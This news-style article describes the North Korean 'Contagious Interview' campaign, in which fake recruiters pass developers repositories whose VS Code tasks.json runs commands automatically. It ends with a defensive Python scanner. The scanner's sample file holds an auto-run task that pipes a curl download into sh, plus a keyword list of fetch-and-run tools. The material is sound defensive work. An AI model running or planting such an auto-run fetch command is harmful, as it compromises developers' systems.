
Security researchers have recently observed a worrying evolution in the offensive tactics attributed to North Korean-linked actors as part of the campaign known as Contagious Interview: no longer simple fake job interview scams, but full-blown compromise techniques that exploit Microsoft Visual Studio Code, one of the most widely used IDEs for modern developers.
The threat initially presents itself as a harmless contact on professional platforms or a GitHub/GitLab repository to be cloned for a “technical evaluation.” This decoy is part of a broader social engineering operation where attackers pose as recruiters to attract software talent.
The real crux is a technical one: attackers include Visual Studio Code configuration files in the repositories, specifically tasks.json, which, once the project is opened in the IDE and the user confirms trust in the source, are automatically processed and can execute arbitrary commands on the user's system.
This technique enables malicious payloads to be executed without any visible action from the developer, seamlessly integrating into standard development workflows. The malicious files often contain obfuscated JavaScript and download additional malicious components from remote servers, setting up backdoors and remote control channels.
The scope of the operation is significant, Darktrace researchers report: the attacks do not only target single devices, but can compromise entire corporate infrastructures thanks to the credentials and privileged access typical of developers, especially in the blockchain, crypto and fintech sectors.
The technique exploited here is not a random bug in Visual Studio Code, but the deliberate abuse of a legitimate feature of the IDE—trusting repositories and automatically configuring tasks—as an attack vector.
The fact that these everyday tools, public Git repositories, widely used code editors, and technical hiring processes, can become sophisticated weapons of compromise highlights the deeper problem: we are inadequately prepared to address threats that integrate social engineering, supply chain, and developer feature abuse.
Defense requires awareness and strict practices: don't blindly trust external code, carefully review configurations before running them, and use isolated environments or virtual machines to test unknown code. Typically, the first barrier isn't the system, but the human decision to "trust" the repository.
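As an added defensive check, not code from the article or from Darktrace, the script below is meant to run on a freshly cloned repository before it is opened in VS Code: it parses every .vscode/tasks.json it finds, lists the tasks configured to run automatically on folder open, and flags commands that fetch or pipe code. The sample tasks.json and the list of risky substrings are constructed assumptions for illustration.

```python
import json
import re
from pathlib import Path

# Constructed sample .vscode/tasks.json (not from the article): one ordinary
# build task and one task that VS Code runs as soon as the folder is trusted.
SAMPLE_TASKS_JSON = r'''{
  // comments and trailing commas are legal in tasks.json
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build" },
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -s http://example.invalid/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" },
    },
  ],
}'''

# Substrings that usually mean "fetch and run something from elsewhere" (assumed heuristic).
RISKY_PATTERNS = ("curl", "wget", "Invoke-WebRequest", "iwr ", "| sh", "| bash",
                  "powershell", "-enc", "base64", "eval", "node -e")

def load_jsonc(text: str) -> dict:
    """Parse VS Code's JSON-with-comments: drop // comment lines and trailing commas."""
    no_comments = re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)
    no_trailing = re.sub(r",(\s*[}\]])", r"\1", no_comments)
    return json.loads(no_trailing)

def find_automatic_tasks(text: str) -> list[dict]:
    """Return every task that auto-runs on folder open, with a risk flag on its command."""
    findings = []
    for task in load_jsonc(text).get("tasks", []):
        if task.get("runOptions", {}).get("runOn") != "folderOpen":
            continue
        parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
        command = " ".join(parts)
        findings.append({"label": task.get("label", "<unnamed>"), "command": command,
                         "risky": any(p in command for p in RISKY_PATTERNS)})
    return findings

def scan_repo(root: str) -> list[dict]:
    """Check every .vscode/tasks.json under a cloned repo before opening it in the IDE."""
    results = []
    for path in Path(root).glob("**/.vscode/tasks.json"):
        for finding in find_automatic_tasks(path.read_text(encoding="utf-8")):
            results.append({"file": str(path), **finding})
    return results

if __name__ == "__main__":
    for f in find_automatic_tasks(SAMPLE_TASKS_JSON):
        print(("RISKY " if f["risky"] else "auto  ") + f["label"] + ": " + f["command"])
```

Running `scan_repo("path/to/clone")` before opening the folder gives a list of what the IDE would execute the moment trust is granted; turning VS Code's `task.allowAutomaticTasks` setting to "off" complements this check.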
Ultimately, this type of operation is not just an isolated cyber attack, but a wake-up call for the security of the modern software supply chain, showing how even consolidated tools can become levers for intrusions of international scope.
